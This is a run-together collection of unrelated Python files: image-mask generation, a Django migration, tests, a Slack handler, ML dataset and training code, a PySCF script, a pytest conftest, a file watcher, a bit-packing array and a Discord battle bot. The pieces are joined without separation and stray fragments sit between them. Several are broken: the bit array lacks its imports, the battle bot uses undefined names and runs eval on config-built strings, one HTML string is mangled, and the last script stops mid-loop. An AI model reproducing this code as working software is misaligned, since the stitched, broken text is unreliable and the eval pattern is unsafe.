mask generation for file in glob.glob(os.path.join(in_dir, "*.png")): im = Image.open(file) width, height = im.size # Find png and corresponding json file by name general_path = file.strip(".png") general_name = os.path.basename(general_path) json_path = general_path + ".json" json_data = open(json_path).read() data = json.loads(json_data) shapes = data["shapes"] masks = {} for shape in shapes: label = shape["label"] points = shape["points"] shape_type = shape["shape_type"] # create new mask if the class appear for the first time if label not in masks: masks[label] = Image.new(pil_mode, (width, height)) draw = ImageDraw.Draw(masks[label]) # TODO: Support more format. Only support polygon and circle yet if shape_type == "polygon": p = [(p[0], p[1]) for p in points] draw.polygon(p, fill=pil_fill) elif shape_type == "circle": center = points[0] another = points[1] radius = math.hypot(another[0] - center[0], another[1] - center[1]) draw.ellipse((center[0] - radius, center[1] - radius, center[0] + radius, center[1] + radius), fill=pil_fill) # create empty mask for absent label existed_mask = set(masks.keys()) absent_mask = mask_list.difference(existed_mask) for absent in absent_mask: masks[absent] = Image.new(pil_mode, (width, height)) # save all masks to file for label, mask in masks.items(): mask_name = "_".join([general_name, label]) mask_path = os.path.join(out_dir, label, mask_name) mask.save(mask_path + ".png", "PNG") # -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2016-11-01 12:50 from __future__ import unicode_literals from django.db import migrations, models import entries.models class Migration(migrations.Migration): dependencies = [ ('entries', '0003_auto_20161031_2323'), ] operations = [ migrations.AlterField( model_name='entry', name='extra', field=entries.models.JSONField(blank=True, default=''), ), migrations.AlterField( model_name='entry', name='what', field=models.CharField(max_length=200), ), ] # Copyright European Organization for Nuclear Research (CERN) # # Licensed under the Apache License, Version 2.0 (the "License"); # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Authors: # - , <>, 2013 # - , <>, 2017 import datetime import json import time import uuid from nose.tools import assert_equal from paste.fixture import TestApp from rucio.web.rest.trace import APP as trace_app class TestTrace(object): @staticmethod def test_submit_trace(): """ TRACE (REST): submit a trace via POST """ mwl = [] payload = json.dumps({'uuid': str(uuid.uuid4()), # not JSON serialisable 'string': 'deadbeef', 'hex': 0xDEADBEEF, 'int': 3, 'float': 3.14, 'long': 314314314314314314L, 'timestamp': time.time(), 'datetime_str': str(datetime.datetime.utcnow()), # not JSON serialisable 'boolean': True}) ret = TestApp(trace_app.wsgifunc(*mwl)).post('/', params=payload, headers={'Content-Type': 'application/octet-stream'}) assert_equal(ret.status, 201) """ Target Options """ from __future__ import print_function, division, absolute_import from .. import config class TargetOptions(object): OPTIONS = {} def __init__(self): self.values = {} def from_dict(self, dic): for k, v in dic.items(): try: ctor = self.OPTIONS[k] except KeyError: fmt = "%r does not support option: '%s'" raise KeyError(fmt % (self.__class__, k)) else: self.values[k] = ctor(v) @classmethod def parse_as_flags(cls, flags, options): opt = cls() opt.from_dict(options) opt.set_flags(flags) return flags def set_flags(self, flags): """ Provide default flags setting logic. Subclass can override. """ kws = self.values.copy() if kws.pop('nopython', False) == False: flags.set("enable_pyobject") if kws.pop("forceobj", False): flags.set("force_pyobject") if kws.pop('looplift', True): flags.set("enable_looplift") if kws.pop('boundcheck', False): flags.set("boundcheck") if kws.pop('_nrt', True): flags.set("nrt") if kws.pop('debug', config.DEBUGINFO_DEFAULT): flags.set("debuginfo") flags.set("boundcheck") if kws.pop('nogil', False): flags.set("release_gil") if kws.pop('no_rewrites', False): flags.set('no_rewrites') if kws.pop('no_cpython_wrapper', False): flags.set('no_cpython_wrapper') if 'parallel' in kws: flags.set('auto_parallel', kws.pop('parallel')) if 'fastmath' in kws: flags.set('fastmath', kws.pop('fastmath')) if 'error_model' in kws: flags.set('error_model', kws.pop('error_model')) if 'inline' in kws: flags.set('inline', kws.pop('inline')) flags.set("enable_pyobject_looplift") if kws: # Unread options? raise NameError("Unrecognized options: %s" % kws.keys()) 1000+ import logging import after_response from response.core.models.incident import Incident from response.slack.models.comms_channel import CommsChannel logger = logging.getLogger(__name__) SLACK_ACTION_MAPPINGS = {} class ActionContext: def __init__(self, incident, user_id, message, value, trigger_id, response_url): self.incident = incident self.user_id = user_id self.message = message self.value = value self.trigger_id = trigger_id self.response_url = response_url def action_handler(callback_id, func=None): def _wrapper(fn): SLACK_ACTION_MAPPINGS[callback_id] = fn return fn if func: return _wrapper(func) return _wrapper def remove_action_handler(callback_id): SLACK_ACTION_MAPPINGS.pop(callback_id, None) @after_response.enable def handle_action(payload): actions = payload["actions"] if actions: action = actions[0] action_id = action["action_id"] if action_id not in SLACK_ACTION_MAPPINGS: logger.error(f"Can't find handler for action id {action_id}") return handler = SLACK_ACTION_MAPPINGS[action_id] user_id = payload["user"]["id"] channel_id = payload["channel"]["id"] message = payload["message"] trigger_id = payload["trigger_id"] response_url = payload["response_url"] action_type = action["type"] if action_type == "button": value = action["value"] elif action_type == "static_select": value = action["selected_option"]["value"] else: logger.error(f"Can't handle action with type {action_type}") return # we want to tie all actions to an incident, and have two ways to do this: # - if action comes from a comms channel, lookup the incident by comms channel id # - if not in comms channel, we rely on the button value containing the incident id try: comms_channel = CommsChannel.objects.get(channel_id=channel_id) incident = comms_channel.incident except CommsChannel.DoesNotExist: incident_id = value incident = Incident.objects.get(pk=incident_id) except Incident.DoesNotExist: logger.error( f"Can't find incident associated with channel {channel_id} or with id {incident_id}" ) return action_context = ActionContext( incident=incident, user_id=user_id, message=message, value=value, trigger_id=trigger_id, response_url=response_url, ) handler(action_context) 0 from __future__ import division from __future__ import print_function from __future__ import absolute_import import numpy as np import tensorflow as tf import collections from ..utils import to_dtype __all__ = ['Dataset', 'Datasets', 'ImageDataset'] Datasets = collections.namedtuple('Datasets', ['train', 'validation', 'test']) class Dataset(object): @property def data(self): return self._data @property def shape(self): return self._data.shape[1:] @property def labels(self): return self._labels @property def num_examples(self): return self._num_examples @property def epochs_completed(self): return self._epochs_completed def __init__(self, data, labels): self._num_examples = data.shape[0] self._data = data self._labels = labels self._epochs_completed = 0 self._index_in_epoch = 0 def next_batch(self, batch_size, shuffle=True): """Return the next `batch_size` examples from this data set. Parameters ---------- batch_size: int The batch size. shuffle: bool Whether to shuffle the data at the beginning of each epoch. """ start = self._index_in_epoch self._index_in_epoch += batch_size if self._index_in_epoch > self._num_examples: if start < self._num_examples: self._index_in_epoch = self._num_examples else: # Finished epoch self._epochs_completed += 1 if shuffle or shuffle == 'batch': self._shuffle(batch_size, shuffle) # Start next epoch start = 0 self._index_in_epoch = batch_size assert batch_size <= self._num_examples end = self._index_in_epoch return self._data[start:end], self._labels[start:end] def _shuffle(self, batch_size, shuffle=True): # Shuffle the data if shuffle == 'batch': perm = self._batch_shuffle(batch_size) else: perm = np.arange(self._num_examples) np.random.shuffle(perm) self._data = self._data[perm] self._labels = self._labels[perm] def _batch_shuffle(self, batch_size): """This shuffles the array in a batch-wise fashion. Useful for shuffling HDF5 arrays (where one cannot access arbitrary indices). """ index_array = np.arange(self._num_examples) batch_count = int(len(index_array) / batch_size) # to reshape we need to be cleanly divisible by batch size # we stash extra items and re-append them after shuffling last_batch = index_array[batch_count * batch_size:] index_array = index_array[:batch_count * batch_size] index_array = index_array.reshape((batch_count, batch_size)) np.random.shuffle(index_array) index_array = index_array.flatten() return np.append(index_array, last_batch) class ImageDataset(Dataset): def __init__(self, data, labels, dtype='float32', reshape=True, preprocess=None): dtype = to_dtype(dtype).base_dtype if dtype not in (tf.uint8, tf.float32): raise TypeError('Invalid image dtype %r, expected uint8 or float32' % dtype) assert data.shape[0] == labels.shape[0], ( 'images.shape: %s labels.shape: %s' % (data.shape, labels.shape)) # Convert shape from [num examples, rows, columns, depth] # to [num examples, rows*columns*depth] if reshape: data = data.reshape(data.shape[0], np.prod(data.shape[1:])) if dtype == tf.float32: # Convert from [0, 255] -> [0.0, 1.0]. data = data.astype(np.float32) data = np.multiply(data, 1.0 / 255.0) super(ImageDataset, self).__init__(data, labels) server/trash_counter/__init__.py import typing import numpy as np from .segmentation import NormalBackground from .detect import ConnectedComponentBoundingBox from .classifier import ClassifyWithDeepNetFeatures import PIL import os import uuid class TrashCounter(object): """ Count trash in an image This class is responsible for detecting objects placed on top of a background, drawing bounding boxes that contain those objects, providing an initial classification for each object, and then returning a dictionary with the object count. """ def __init__(self, background=NormalBackground(), detector=ConnectedComponentBoundingBox(), classifier=ClassifyWithDeepNetFeatures()): self.background = background self.detector = detector self.classifier = classifier self.training_image_counter = 0 def create_chip(self, image, bbox): """ Make an image chip from the full image """ array = np.array(image) return PIL.Image.fromarray(array[bbox[0]:bbox[2], bbox[1]:bbox[3], :]) def make_data_image(self, fname, chip_directory="chips/"): """ Helper function to get features for training """ image = PIL.Image.open(fname).convert("RGB") self.background.update(image) background_mask = self.background.get_background_mask(image) foreground_mask = ~background_mask # ========== Group the foreground pixels into objects ================ bounding_boxes = self.detector.get_bounding_boxes(foreground_mask) # =========== Create a data set ======================= feature_set = [] for bbox in bounding_boxes: chip = self.create_chip(image, bbox) chip.save(open(os.path.join(chip_directory, "image_{0}.png".format(self.training_image_counter)), "wb")) feature_set.append(self.classifier.get_features(image, bbox).flatten()) self.training_image_counter += 1 return feature_set def make_data(self, fname_list, chip_directory="chips/"): """ Function to processs images for training """ feature_set = None for fname in fname_list: new_features = self.make_data_image(fname, chip_directory) if feature_set is None: feature_set = new_features else: feature_set += new_features return feature_set def __call__(self, fname, image_dir="image_chips/"): """ Count the trash in the provided image """ os.makedirs(image_dir, exist_ok=True) # ========== Read the Image =========================================== image = PIL.Image.open(fname).convert("RGB") # ========== Identify foreground and background pixels ================ self.background.update(image) background_mask = self.background.get_background_mask(image) foreground_mask = ~background_mask # Save the foreground mask for debugging self.foreground_mask = foreground_mask # ========== Group the foreground pixels into objects ================ bounding_boxes = self.detector.get_bounding_boxes(foreground_mask) # Save the bounding boxes for debugging self.bounding_boxes = bounding_boxes # ===================== Classify the Objects ========================== classes = self.classifier.predict(image, bounding_boxes) self.classes = classes # =================== Return the Chips + Classes ====================== report = [] for bbox, label in zip(bounding_boxes, classes): fname = os.path.join(image_dir, uuid.uuid4().__str__()) + "_" + label + ".png" chip = self.create_chip(image, bbox) chip.save(open(fname, "wb")) report.append({"image_path":fname, "label":label}) return report import sys import argparse from pyscf import gto, scf from pyscf.geomopt import berny_solver # ----------------------- # Argument Parser # ----------------------- parser = argparse.ArgumentParser() parser.add_argument('--atomic-coords', help='atomic coordinates') parser.add_argument('--density-fit', help='density fitting method') parser.add_argument('--basis-set', help='basis set') parser.add_argument('--aux-basis-set', help='auxiliary basis set') parser.add_argument('--pseudo-potential', help='pseudo potential') parser.add_argument('--functional', help='dft functional') parser.add_argument('--charge', help='charge') parser.add_argument('--multiplicity', help='multiplicity') parser.add_argument('--k-points', help='k-points [3x1]') parser.add_argument('--lattice-vectors', help='lattice vectors [3x3]') parser.add_argument('--frozen-cores', help='number of frozen cores') results, remaining = parser.parse_known_args() atomic_coords = results.atomic_coords.replace('\\n', '\n') density_fit = results.density_fit.upper( ) if results.density_fit != 'undefined' else None basis_set = results.basis_set aux_basis_set = (results.aux_basis_set if results.aux_basis_set != 'undefined' else None) pseudo_potential = (results.pseudo_potential if results.pseudo_potential != 'undefined' else None) functional = results.functional charge = int(results.charge) if results.charge is not None else 0 multiplicity = int( results.multiplicity) if results.multiplicity is not None else 1 spin = (multiplicity - 1) / 2 num_frozen_cores = int( results.frozen_cores) if results.frozen_cores is not None else 0 sys.argv = [sys.argv[0]] # ----------------------- # PYSCF # ----------------------- mol = gto.M( atom=atomic_coords, basis=basis_set, spin=spin, charge=charge, verbose=4) mf = scf.UHF(mol) mf.conv_tol = 1e-4 mf.max_cycle = 100 if density_fit: mf = mf.density_fit() mf.with_df.auxbasis = aux_basis_set new_mol = berny_solver.optimize(mf, assert_convergence=True) print("New geometry (unit A)") for atom_index, atomic_coord in enumerate(new_mol.atom): print("{:4} {:s} {:18.12f} {:16.12f} {:16.12f}".format( atom_index, atomic_coord[0], atomic_coord[1][0], atomic_coord[1][1], atomic_coord[1][2])) #!/usr/bin/env python3 # -*- coding:utf-8 -*- import base64 import pytest import allure from py.xml import html from selenium import webdriver from config.conf import cm from common.readconfig import ini from utils.times import timestamp from utils.send_mail import send_report driver = None @pytest.fixture(scope='session', autouse=True) def drivers(request): global driver if driver is None: driver = webdriver.Chrome() driver.maximize_window() def fn(): driver.quit() request.addfinalizer(fn) return driver @pytest.hookimpl(hookwrapper=True) def pytest_runtest_makereport(item): """ 当测试失败的时候,自动截图,展示到html报告中 :param item: """ pytest_html = item.config.pluginmanager.getplugin('html') outcome = yield report = outcome.get_result() report.description = str(item.function.__doc__) extra = getattr(report, 'extra', []) if report.when == 'call' or report.when == "setup": xfail = hasattr(report, 'wasxfail') if (report.skipped and xfail) or (report.failed and not xfail): screen_img = _capture_screenshot() if screen_img: html = '
screenshot
' % screen_img extra.append(pytest_html.extras.html(html)) report.extra = extra def pytest_html_results_table_header(cells): cells.insert(1, html.th('用例名称')) cells.insert(2, html.th('Test_nodeid')) cells.pop(2) def pytest_html_results_table_row(report, cells): cells.insert(1, html.td(report.description)) cells.insert(2, html.td(report.nodeid)) cells.pop(2) def pytest_html_results_table_html(report, data): if report.passed: del data[:] data.append(html.div('通过的用例未捕获日志输出.', class_='empty log')) def pytest_html_report_title(report): report.title = "pytest示例项目测试报告" def pytest_configure(config): config._metadata.clear() config._metadata['测试项目'] = "测试百度官网搜索" config._metadata['测试地址'] = ini.url def pytest_html_results_summary(prefix, summary, postfix): # prefix.clear() # 清空summary中的内容 prefix.extend([html.p("所属部门: XX公司测试部")]) prefix.extend([html.p("测试执行人: 随风挥手")]) def pytest_terminal_summary(terminalreporter, exitstatus, config): """收集测试结果""" result = { "total": terminalreporter._numcollected, 'passed': len(terminalreporter.stats.get('passed', [])), 'failed': len(terminalreporter.stats.get('failed', [])), 'error': len(terminalreporter.stats.get('error', [])), 'skipped': len(terminalreporter.stats.get('skipped', [])), # terminalreporter._sessionstarttime 会话开始时间 'total times': timestamp() - terminalreporter._sessionstarttime } print(result) if result['failed'] or result['error']: send_report() def _capture_screenshot(): """截图保存为base64""" now_time, screen_file = cm.screen_path driver.save_screenshot(screen_file) allure.attach.file(screen_file, "失败截图{}".format(now_time), allure.attachment_type.PNG) with open(screen_file, 'rb') as f: imagebase64 = base64.b64encode(f.read()) return imagebase64.decode() from day2 import parse_instructions, run_program import unittest class Day1TestCase(unittest.TestCase): def test_parse_instructions(self): self.assertEqual([1, 0, 0, 0, 99], parse_instructions("1,0,0,0,99")) self.assertEqual([2, 3, 0, 3, 99], parse_instructions("2,3,0,3,99")) self.assertEqual([2, 4, 4, 5, 99, 0], parse_instructions("2,4,4,5,99,0")) self.assertEqual( [1, 1, 1, 4, 99, 5, 6, 0, 99], parse_instructions("1,1,1,4,99,5,6,0,99") ) def test_run_program_1(self): instructions = [1, 0, 0, 0, 99] expected = [2, 0, 0, 0, 99] self.assertEqual(expected, run_program(instructions)) def test_run_program_2(self): instructions = [2, 3, 0, 3, 99] expected = [2, 3, 0, 6, 99] self.assertEqual(expected, run_program(instructions)) def test_run_program_3(self): instructions = [2, 4, 4, 5, 99, 0] expected = [2, 4, 4, 5, 99, 9801] self.assertEqual(expected, run_program(instructions)) def test_run_program_4(self): instructions = [1, 1, 1, 4, 99, 5, 6, 0, 99] expected = [30, 1, 1, 4, 2, 5, 6, 0, 99] self.assertEqual(expected, run_program(instructions)) def test_run_program_5(self): instructions = [1, 9, 10, 3, 2, 3, 11, 0, 99, 30, 40, 50] expected = [3500, 9, 10, 70, 2, 3, 11, 0, 99, 30, 40, 50] self.assertEqual(expected, run_program(instructions)) # Copyright (C) 2021-2022 Intel Corporation # SPDX-License-Identifier: Apache-2.0 # """ This module contains utility functions for use in defining ui rules """ from typing import Union from ote_sdk.configuration.ui_rules.types import Action, Operator def attr_convert_operator(operator: Union[str, Operator]) -> Operator: """ This function converts an input operator to the correct instance of the Operator Enum. It is used when loading an Rule element from a yaml file. """ if isinstance(operator, str): return Operator[operator] return operator def attr_convert_action(action: Union[str, Action]) -> Action: """ This function converts an input action to the correct instance of the Action Enum. It is used when loading an Rule element from a yaml file. """ if isinstance(action, str): return Action[action] return action from flask_wtf import FlaskForm from wtforms import StringField, SubmitField from wtforms.validators import ValidationError, DataRequired, Email, Length class SignupForm(FlaskForm): email = StringField(('Email'), validators=[Email(), DataRequired()]) submit = SubmitField('Sign Up') class LoginForm(FlaskForm): email = StringField('Email', validators=[Length(min=6), Email(message='Enter a valid email'), DataRequired()]) submit = SubmitField('Log In') 10-100 import logging import threading import time from typing import Callable, Dict, Optional, Iterator # noqa from chalice.cli.filewatch import FileWatcher, WorkerProcess from chalice.utils import OSUtils LOGGER = logging.getLogger(__name__) class StatWorkerProcess(WorkerProcess): def _start_file_watcher(self, project_dir): # type: (str) -> None watcher = StatFileWatcher() watcher.watch_for_file_changes(project_dir, self._on_file_change) def _on_file_change(self): # type: () -> None self._restart_event.set() class StatFileWatcher(FileWatcher): POLL_INTERVAL = 1 def __init__(self, osutils=None): # type: (Optional[OSUtils]) -> None self._mtime_cache = {} # type: Dict[str, int] self._shutdown_event = threading.Event() self._thread = None # type: Optional[threading.Thread] if osutils is None: osutils = OSUtils() self._osutils = osutils def watch_for_file_changes(self, root_dir, callback): # type: (str, Callable[[], None]) -> None t = threading.Thread(target=self.poll_for_changes_until_shutdown, args=(root_dir, callback)) t.daemon = True t.start() self._thread = t LOGGER.debug("Stat file watching: %s, with callback: %s", root_dir, callback) def poll_for_changes_until_shutdown(self, root_dir, callback): # type: (str, Callable[[], None]) -> None self._seed_mtime_cache(root_dir) while not self._shutdown_event.isSet(): self._single_pass_poll(root_dir, callback) time.sleep(self.POLL_INTERVAL) def _seed_mtime_cache(self, root_dir): # type: (str) -> None for rootdir, _, filenames in self._osutils.walk(root_dir): for filename in filenames: path = self._osutils.joinpath(rootdir, filename) self._mtime_cache[path] = self._osutils.mtime(path) def _single_pass_poll(self, root_dir, callback): # type: (str, Callable[[], None]) -> None new_mtimes = {} # type: Dict[str, int] for path in self._recursive_walk_files(root_dir): if self._is_changed_file(path, new_mtimes): callback() return if new_mtimes != self._mtime_cache: # Files were removed. LOGGER.debug("Files removed, triggering restart.") self._mtime_cache = new_mtimes callback() return def _is_changed_file(self, path, new_mtimes): # type: (str, Dict[str, int]) -> bool last_mtime = self._mtime_cache.get(path) if last_mtime is None: LOGGER.debug("File added: %s, triggering restart.", path) return True try: new_mtime = self._osutils.mtime(path) if new_mtime > last_mtime: LOGGER.debug("File updated: %s, triggering restart.", path) return True new_mtimes[path] = new_mtime return False except (OSError, IOError): return False def _recursive_walk_files(self, root_dir): # type: (str) -> Iterator[str] for rootdir, _, filenames in self._osutils.walk(root_dir): for filename in filenames: path = self._osutils.joinpath(rootdir, filename) yield path class nBitArray() : m = 32 f = 'I' _default_type = None def __init__(self, n_bit) : if not (isinstance(n_bit, int) and n_bit > 0) : raise ValueError self.n_bit = n_bit self.n_item = 0 self.b_mask = (2 ** self.n_bit) - 1 self.i_mask = ((0x1 << self.m) - 1) def _normalize_index(self, index) : if (-1 * self.n_item) <= index < 0 : index += self.n_item if 0 <= index < self.n_item : return index raise IndexError def __getitem__(self, index): if isinstance(index, int) : return self._get_at(self._normalize_index(index)) elif isinstance(index, slice) : return (self._get_at(i) for i in range(* index.indices(self.n_item))) else: raise TypeError("index must be int or slice") def __str__(self) : u = io.StringIO() for n, i in enumerate(self._data) : u.write("{0:08X}".format(i)) u.write('\n' if (n + 1) % 6 == 0 else ' ') return u.getvalue() def load_data(self, value_lst) : """ load a list of n_bit words """ w_curs = 0 # position in the word word = 0 stack = list() for n, value in enumerate(value_lst) : value = value & self.b_mask v_curs = 0 # position in the value v_count = self.n_bit - v_curs # number of remaining bits to be written w_count = self.m - w_curs # number of bits available in the word while v_count > 0 : if w_count <= v_count : p = value >> (v_count - w_count) word |= p & self.i_mask v_curs += w_count w_curs += w_count else : p = value << (w_count - v_count) word |= p & self.i_mask v_curs += v_count w_curs += v_count if w_curs == self.m : stack.append(word) word = 0 w_curs = 0 v_count = self.n_bit - v_curs w_count = self.m - w_curs if word : stack.append(word) self.n_item = len(value_lst) self._data = array.array(self.f, stack) return self def _get_at(self, v_index) : if not 0 <= v_index < self.n_item : raise IndexError b = v_index * self.n_bit i_index = b // self.m # index of the word #print(v_index, b, i_index) v_curs = 0 # position in the value w_curs = b % self.m # position in the word v_count = self.n_bit - v_curs # number of remaining bits to append to the value w_count = self.m - w_curs # number of remaining bits to be read from the word value = 0 while v_count > 0 : #print("v curs={0}, count={1} - w curs={2}, count={3}".format(v_curs, v_count, w_curs, w_count)) if w_count <= v_count : value = (value << self.m) | self._data[i_index] #print("IF -> value = {0:05X}".format(value & self.b_mask)) v_curs += w_count w_curs += w_count else : value = (value << v_count) | (self._data[i_index] >> (w_count - v_count)) #print("ELSE -> value = {0:05X}".format(value & self.b_mask)) v_curs += v_count w_curs += v_count if w_curs == self.m : i_index += 1 w_curs = 0 v_count = self.n_bit - v_curs w_count = self.m - w_curs return value & self.b_mask if __name__ == '__main__' : high_res_sinus = [int(math.sin(i) * 0x3FFFFF) & 0x3FFFFF for i in range(10000)] low_res_sinus = [int(math.sin(i) * 0x3) & 0x3FFFFF for i in range(10000)] def do(array, name, size) : data = nBitArray(size).load_data(array)._data.tobytes() compressed = gzip.compress(data) print("{3}:{4} bits: {0} -> {1} ({2:0.1f} %)".format( len(data), len(compressed), 100 * len(compressed) / len(data), name, size) ) do(high_res_sinus, "high_res_sinus", 22) do(high_res_sinus, "high_res_sinus", 24) do(low_res_sinus, "low_res_sinus", 22) do(low_res_sinus, "low_res_sinus", 24) #WAP to accept a string from user and replace all occurrances of first character except for the first character. name = input("Please enter a string: ") replaceToken = input("Please enter token to replace: ") print (name) name2 = name[0] + name[1:].replace(name[0], replaceToken) print (name2)core/battle.py #!/usr/local/bin/python3 import time import json import yaml import asyncio from discord import Embed from core.common import make_embed, dictsub, SERVSET import core.party as party with open('conf/battletext.yaml', 'r') as yamlf: TEXT = yaml.load(yamlf) with open('conf/formulas.yaml', 'r') as yamlf: FORMULAS = yaml.load(yamlf)['battle'] def get_hpbar(MEM): BARSIZE = 20 PERDEC = round(MEM['stats']['hp'] / MEM['stats']['maxhp'], 2) CURPER = int(PERDEC * 100) NOTCHES = int(PERDEC * BARSIZE) BAR = '[' for hp in range(BARSIZE): if hp <= NOTCHES: BAR = BAR + '|' else: BAR = BAR + '-' BAR = BAR + '] ' + str(CURPER) + '%' return BAR def gen_cooldown(SECS): for sec in range(SECS, 1, -1): yield sec class battle(object): def __init__(self, PARTY, MONSTERS): self.STATUS = True self.ENDSTATE = '' self.PARTY = PARTY self.MONSTERS = MONSTERS def monster_party(self): SUBS = {} TEMP = TEXT['enemy_party'].copy() FIELDS = TEMP.pop('fields') TEMP['fields'] = [] for monster in self.MONSTERS.keys(): MON = self.MONSTERS[monster].copy() MON['hpbar'] = get_hpbar(MON) TEMP['fields'].append(dictsub(FIELDS[0], MON)) EMBD = dictsub(TEMP, SUBS) return make_embed(EMBD) def player_party(self): SUBS = {} TEMP = TEXT['player_party'].copy() FIELDS = TEMP.pop('fields') TEMP['fields'] = [] for player in self.PARTY.keys(): MEM = self.PARTY[player].copy() MEM['hpbar'] = get_hpbar(MEM) TEMP['fields'].append(dictsub(FIELDS[0], MEM)) EMBD = dictsub(TEMP, SUBS) return make_embed(EMBD) def cmdparse(self, CMD): ACTION = CMD.lower().split(' ') PLAYER = self.PARTY[MSG.author.id] if ACTION[0] in PLAYER['skills'].keys(): SKLD = PLAYER['skills'][ACTION[0]] if len(ACTION) < 2: TARGET = 1 else: TARGET = ACTION[1] self.do_action(SKLD, PLAYER, TARGET) def do_action(self, SKLD, PLAYER, TARGET): SUBS = SKLD.copy() SUBS['mod'] = PLAYER['stats'][SKLD['mod']] if SKLD['target'] == 'enemy': if TARGET not in self.MONSTERS: TARGET = 1 for t in SKLD['type']: FTEMP = FORMULAS[t] FORMRES = eval(dictsub(FTEMP, SUBS)) if t == 'damage': self.MONSTERS[TARGET]['stats']['hp'] -= FORMRES async def msgparse(MSG): try: if MSG.content == '//form': await party.form_party(MSG.channel, MSG.author) BTL.cmdparse(MSG.content[2:]) except NameError: pass async def form_party(BTLLOB, PLAYER): PARTY = party.gather_party(PLAYER.id) GPMSG = await BTLLOB.send(embed=PARTY.display_status()) def check(msg): return msg.channel == BTLLOB and msg.content.startswith('//join') MSG = await CLIENT.wait_for('message', check=check) for cntdwn in range(10, 0, -1): SUBS = { 'cntdwn': cntdwn } EMBD = dictsub(BASECNT, SUBS) await GPMSG.edit(embed=make_embed(EMBD)) await asyncio.sleep(1) PARTY = await CLIENT.get_reaction_users(RES[0]) await MSG.delete() return PARTY async def setup(CLIENT, GUILD, CATEGORY): global BTL for chan in CATEGORY.channels: if chan.name == 'battles_lobby': BTLLOB = chan await BTLLOB.purge() await BTLLOB.send(embed=make_embed(TEXT['battle_lobby_top'])) while True: JOINED = await gather_party(CLIENT, BTLCHAN) PARTY = creators.setup_player_party(JOINED) MONSTERS = creators.generate_monster(1) BTL = battle(PARTY, MONSTERS) MPMSG = await BTLCHAN.send(embed=BTL.monster_party()) PPMSG = await BTLCHAN.send(embed=BTL.player_party()) COUNT = 0 while BTL.STATUS == True: await MPMSG.edit(embed=BTL.monster_party()) await PPMSG.edit(embed=BTL.player_party()) await asyncio.sleep(1) COUNT += 1 0 import sys import os import argparse import datetime import gym import numpy as np import itertools import torch from sac import SAC # from torch.utils.tensorboard import SummaryWriter from replay_memory import ReplayMemory from utils import hard_update import pybullet_env_mods def main(): parser = argparse.ArgumentParser(description='PyTorch Soft Actor-Critic Args') parser.add_argument('--env-name', default="HighFreqReacherBulletEnv-v0", help='Mujoco Gym environment (default: HalfCheetah-v2)') parser.add_argument('--policy', default="Gaussian", help='Policy Type: Gaussian | Deterministic (default: Gaussian)') parser.add_argument('--eval', type=bool, default=False, help='Evaluates a policy a policy every 10 episode (default: True)') parser.add_argument('--gamma', type=float, default=0.99, metavar='G', help='discount factor for reward (default: 0.99)') parser.add_argument('--tau', type=float, default=0.005, metavar='G', help='target smoothing coefficient(τ) (default: 0.005)') parser.add_argument('--lr', type=float, default=0.0003, metavar='G', help='learning rate (default: 0.0003)') parser.add_argument('--alpha', type=float, default=0.2, metavar='G', help='Temperature parameter α determines the relative importance of the entropy\ term against the reward (default: 0.2)') parser.add_argument('--automatic_entropy_tuning', type=bool, default=True, metavar='G', help='Automaically adjust α (default: False)') parser.add_argument('--seed', type=int, default=123456, metavar='N', help='random seed (default: 123456)') parser.add_argument('--batch_size', type=int, default=256, metavar='N', help='batch size (default: 256)') parser.add_argument('--num_steps', type=int, default=125000, metavar='N', help='maximum number of steps (default: 1000000)') parser.add_argument('--hidden_size', type=int, default=256, metavar='N', help='hidden size (default: 256)') parser.add_argument('--updates_per_step', type=int, default=1, metavar='N', help='model updates per simulator step (default: 1)') parser.add_argument('--start_steps', type=int, default=10000, metavar='N', help='Steps sampling random actions (default: 10000)') parser.add_argument('--target_update_interval', type=int, default=1, metavar='N', help='Value target update per no. of updates per step (default: 1)') parser.add_argument('--replay_size', type=int, default=1000000, metavar='N', help='size of replay buffer (default: 10000000)') parser.add_argument('--cuda', action="store_true", help='run on CUDA (default: False)') parser.add_argument('--act_dt', required=False, type=float, default='0.016') parser.add_argument('--update_period', required=False, type=float, default='1.0') parser.add_argument('--g_exp', required=False, type=float, default='1.0') parser.add_argument('--sim_dt', required=False, type=float, default='0.002') args = parser.parse_args() # sim_dt = 0.002 # dt-aware # args.gamma = args.gamma ** (args.act_dt / 0.016) args.gamma = args.gamma ** (args.g_exp) args.replay_size = int(args.replay_size * (0.016 / args.act_dt)) env_dir_id = 'invdblpndlm4' if args.env_name == 'HighFreqInvertedDoublePendulumBulletEnv-v0' else 'reacher' weights_dir = 'sac_runs/dt_weights_' + env_dir_id + '/' + str(args.seed) returns_dir = 'sac_runs/dt_returns_' + env_dir_id + '/' + str(args.seed) # run_id = str(args.act_dt) + '_' + str(args.batch_size) + '_' + str(args.update_period) + '_' + str(args.sim_dt) run_id = '{}_{}_{}_{}_{}_{}_{}_{}'.format(args.act_dt, args.batch_size, args.update_period, args.g_exp, args.replay_size, args.tau, args.target_update_interval, args.sim_dt) weights_path_actor = weights_dir + '/' + run_id + '_actor.pth' weights_path_critic = weights_dir + '/' + run_id + '_critic.pth' returns_path = returns_dir + '/' + run_id + '.csv' if os.path.exists(returns_path): print('This run has happened before. Returns are available at: ' + returns_path) sys.exit() for dirname in [weights_dir, returns_dir]: if not os.path.exists(dirname): os.makedirs(dirname, exist_ok=True) args.num_steps = args.num_steps * int(0.016 // args.sim_dt) args.start_steps = args.start_steps * int(0.016 // args.sim_dt) # Environment # env = NormalizedActions(gym.make(args.env_name)) env = gym.make(args.env_name) env.seed(args.seed) env.action_space.seed(args.seed) # NOTE there should be a better way to do this env.robot.clip_scale = 1.0 torch.manual_seed(args.seed) np.random.seed(args.seed) # Agent updated_agent = SAC(env.observation_space.shape[0], env.action_space, args) agent = SAC(env.observation_space.shape[0], env.action_space, args) hard_update(agent.policy, updated_agent.policy) #Tesnorboard # writer = SummaryWriter('runs/{}_SAC_{}_{}_{}'.format(datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"), args.env_name, # args.policy, "autotune" if args.automatic_entropy_tuning else "")) # Memory memory = ReplayMemory(args.replay_size, args.seed) # Training Loop total_numsteps = 0 updates = 0 total_agent_steps = 0 ac_interval = args.act_dt // args.sim_dt for i_episode in itertools.count(1): r_buffer = 0 agent_steps = 0 episode_reward = 0 episode_steps = 0 done = False state = env.reset() while not done: if episode_steps % ac_interval == 0: if len(memory) > args.batch_size: if True: #(args.update_period <= 1) or ((args.update_period > 1) and (total_agent_steps % args.update_period == 0)): 